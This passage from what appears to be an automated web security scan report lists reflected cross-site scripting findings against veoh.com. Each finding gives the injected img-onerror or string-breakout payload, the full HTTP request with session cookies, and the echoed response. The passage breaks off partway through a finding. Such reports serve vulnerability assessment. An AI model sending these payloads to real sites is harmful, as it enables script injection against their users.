This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure6cf07"><img%20src%3da%20onerror%3dalert(1)>5bb73bd76de/watch/v20754927ZpAfSEzt HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:12 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=62
Content-Length: 76243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure6cf07"><img src=a onerror=alert(1)>5bb73bd76de/sort/most viewed" selected="selected">
...[SNIP]...

3.427. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f615e'%3b41e7360e1ba was submitted in the REST URL parameter 6. This input was echoed as f615e';41e7360e1ba in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v20754927ZpAfSEztf615e'%3b41e7360e1ba HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:59 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=64
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'5591f40422a84545ee8f5d97b940cf99',
'v20754927ZpAfSEztf615e';41e7360e1ba'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

3.428. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c9a6b<img%20src%3da%20onerror%3dalert(1)>0a8a5dfab55 was submitted in the REST URL parameter 4. This input was echoed as c9a6b<img src=a onerror=alert(1)>0a8a5dfab55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventurec9a6b<img%20src%3da%20onerror%3dalert(1)>0a8a5dfab55/watch/v20756872Ta2Y7sDB HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:37 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=19
Content-Length: 76652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventurec9a6b<img src=a onerror=alert(1)>0a8a5dfab55"}</textarea>
...[SNIP]...

3.429. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29b15"><img%20src%3da%20onerror%3dalert(1)>23623364388 was submitted in the REST URL parameter 4. This input was echoed as 29b15"><img src=a onerror=alert(1)>23623364388 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure29b15"><img%20src%3da%20onerror%3dalert(1)>23623364388/watch/v20756872Ta2Y7sDB HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:30 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=73
Content-Length: 76696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure29b15"><img src=a onerror=alert(1)>23623364388/sort/most viewed" selected="selected">
...[SNIP]...

3.430. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80777'%3b1ead9050767 was submitted in the REST URL parameter 6. This input was echoed as 80777';1ead9050767 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB80777'%3b1ead9050767 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:48 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=90
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'b138432a0face8cd7e780e59252637f7',
'v20756872Ta2Y7sDB80777';1ead9050767'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

3.431. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20757961gnh48zmS [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20757961gnh48zmS

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55707"><img%20src%3da%20onerror%3dalert(1)>2b623c86a4a was submitted in the REST URL parameter 4. This input was echoed as 55707"><img src=a onerror=alert(1)>2b623c86a4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure55707"><img%20src%3da%20onerror%3dalert(1)>2b623c86a4a/watch/v20757961gnh48zmS HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:23 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=100
Content-Length: 76349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure55707"><img src=a onerror=alert(1)>2b623c86a4a/sort/most viewed" selected="selected">
...[SNIP]...

3.432. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20757961gnh48zmS [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20757961gnh48zmS

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a9c05<img%20src%3da%20onerror%3dalert(1)>ebb993b4b67 was submitted in the REST URL parameter 4. This input was echoed as a9c05<img src=a onerror=alert(1)>ebb993b4b67 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventurea9c05<img%20src%3da%20onerror%3dalert(1)>ebb993b4b67/watch/v20757961gnh48zmS HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:37 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=78
Content-Length: 76305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventurea9c05<img src=a onerror=alert(1)>ebb993b4b67"}</textarea>
...[SNIP]...

3.433. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20757961gnh48zmS [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20757961gnh48zmS

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1adb'%3b90455422d30 was submitted in the REST URL parameter 6. This input was echoed as a1adb';90455422d30 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v20757961gnh48zmSa1adb'%3b90455422d30 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:47 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=42
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'78598efc6e65465524451afb8963c2f3',
'v20757961gnh48zmSa1adb';90455422d30'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

3.434. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20758438BTte3QQz [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20758438BTte3QQz

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1f894<img%20src%3da%20onerror%3dalert(1)>9de463e3ec9 was submitted in the REST URL parameter 4. This input was echoed as 1f894<img src=a onerror=alert(1)>9de463e3ec9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure1f894<img%20src%3da%20onerror%3dalert(1)>9de463e3ec9/watch/v20758438BTte3QQz HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:42 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=70
Content-Length: 74555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure1f894<img src=a onerror=alert(1)>9de463e3ec9"}</textarea>
...[SNIP]...

3.435. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20758438BTte3QQz [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20758438BTte3QQz

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81165"><img%20src%3da%20onerror%3dalert(1)>17f00c2e735 was submitted in the REST URL parameter 4. This input was echoed as 81165"><img src=a onerror=alert(1)>17f00c2e735 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure81165"><img%20src%3da%20onerror%3dalert(1)>17f00c2e735/watch/v20758438BTte3QQz HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:36 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=68
Content-Length: 74599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure81165"><img src=a onerror=alert(1)>17f00c2e735/sort/most viewed" selected="selected">
...[SNIP]...

3.436. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20758438BTte3QQz [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20758438BTte3QQz

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d86c9'%3b11294ec602e was submitted in the REST URL parameter 6. This input was echoed as d86c9';11294ec602e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v20758438BTte3QQzd86c9'%3b11294ec602e HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:52 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=60
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'c0d9e3d7f1023f54ebaf4a7452132be1',
'v20758438BTte3QQzd86c9';11294ec602e'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

3.437. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr

Issue detail

